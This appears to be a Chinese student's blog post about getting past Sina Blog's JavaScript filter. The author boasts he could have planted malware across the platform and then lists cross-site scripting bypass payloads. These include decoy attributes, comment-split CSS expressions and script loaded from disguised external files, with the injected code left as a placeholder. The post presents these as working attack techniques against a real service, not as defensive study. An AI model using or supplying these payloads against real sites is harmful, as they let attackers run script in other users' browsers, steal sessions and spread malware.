本技术基于黑客技术AJAX HACKING 攻击所写。在这里也给喜欢黑客的朋友，推荐一个学习的网站：黑客防线

新浪系统升级之后，完全屏蔽了js代码。其实js代码的使用会带来很多弊端。以前之所以支持js只是我们简单的绕过了屏蔽而已。因此可以看来再好的系统也是存在漏洞的。之前我可以通过挂马完全把新浪这个博客平台搞得一塌胡涂。但是冰河没有这么做，也算是在恪守自己做人的底线吧。也有博友批评我了，说是问题回复的太慢。我想反问我自己的是：“我有什么资格刷大牌？” 我接受批评，但是我是我真的没有多少时间去做博客，我也不希望博客给我带来负担。又到期末了，考试自然是大学最烦死人的事情！复习的重点有的老师竟然画了一本书，外加40多页的复习资料，我都疯了！！！这一学期十几门课程，时间我都挤干了才可以出来写点博客文章。还是希望大家理解。

今天冰河就简单得谈一下这种技术的使用---绕过js代码屏蔽

方案如下：（本文仅供参考，谢绝转载！）

1.插入混淆属性
当我们在文字录入时可以发现不是所有的javascript的字符都会屏蔽，而是只有在html标签内的字符才可以被过滤掉，这时我们可以采用另一种绕过的方式，在代码的属性前面插入另一种混淆的属性，让过滤系统中误认为是标签结束符的字符，从而让过滤系统认为执行代码在html的外面，比如：
<img src="abc>" onmouseover="[code]">   //插入混淆的src属性
<IMG """><SCRIPT>[code]</SCRIPT>">      //插入混淆的双引号“>”符号
<SCRIPT a=">" SRC="xss.js"></SCRIPT>    //插入混淆的a的属性
2.用注释符分割
由于浏览器会忽略掉每种代码的注释符，因此我们可以在代码中插入每种代码的注释符就可以欺骗过滤系统，并不影响代码的正常运行。比如：
<img style="xss:expr"/* XSS*/ession([code])">    //css的注释符为/**/，其中的内容会被忽略
<style><!--</style><script>[code]//--></script>  //html的注释符为<!--注释-->
3.js代码的编码和调用
如果过滤系统会屏蔽很多的特征字符的代码，那么以上的绕过过滤就会很麻烦，所以典型的绕过方案就是对这些代码进行js代码，或者干脆从外部调用过来。当然由于浏览器对AJAX的安全机制，你必须保证调用的文件在相同的服务器上，否则就会出现错误。
<style>@import "xss.css";</style>  //调用另一个css，可以在xss.css中放入执行代码
<SCRIPT> src="xss.jpg" </SCRIPT>    //在调用js文件时，js文件可以为任意后缀名
上面的这些代码不一定能够绕过屏蔽，我仅仅是提供一种方法供大家参考，具体的问题可能还会遇到很多的技术瓶颈，感兴趣的朋友可以研究一下！